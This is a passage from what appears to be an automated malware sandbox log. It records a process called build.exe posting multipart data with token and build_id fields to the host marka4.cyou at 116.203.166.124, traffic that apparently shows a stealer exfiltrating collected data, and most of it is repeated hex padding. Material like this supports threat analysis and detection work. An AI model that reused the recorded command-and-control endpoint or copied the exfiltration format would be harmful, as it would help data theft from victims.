AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:24 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:24 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:24 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:24 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:24 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:24 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:24 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49776	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:26 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----589000zcj5xbieu37yu3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:26 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 38 39 30 30 30 7a 63 6a 35 78 62 69 65 75 33 37 79 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 35 38 39 30 30 30 7a 63 6a 35 78 62 69 65 75 33 37 79 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 35 38 39 30 30 30 7a 63 6a 35 78 62 69 65 75 33 37 79 75 33 0d 0a 43 6f 6e 74 Data Ascii: ------589000zcj5xbieu37yu3Content-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------589000zcj5xbieu37yu3Content-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------589000zcj5xbieu37yu3Cont
2025-01-11 22:00:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:26 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:26 UTC	717	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:27 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49777	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:28 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----p8gdtrqimyusrimgdba1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 6990993 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:28 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 70 38 67 64 74 72 71 69 6d 79 75 73 72 69 6d 67 64 62 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 70 38 67 64 74 72 71 69 6d 79 75 73 72 69 6d 67 64 62 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 70 38 67 64 74 72 71 69 6d 79 75 73 72 69 6d 67 64 62 61 31 0d 0a 43 6f 6e 74 Data Ascii: ------p8gdtrqimyusrimgdba1Content-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------p8gdtrqimyusrimgdba1Content-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------p8gdtrqimyusrimgdba1Cont
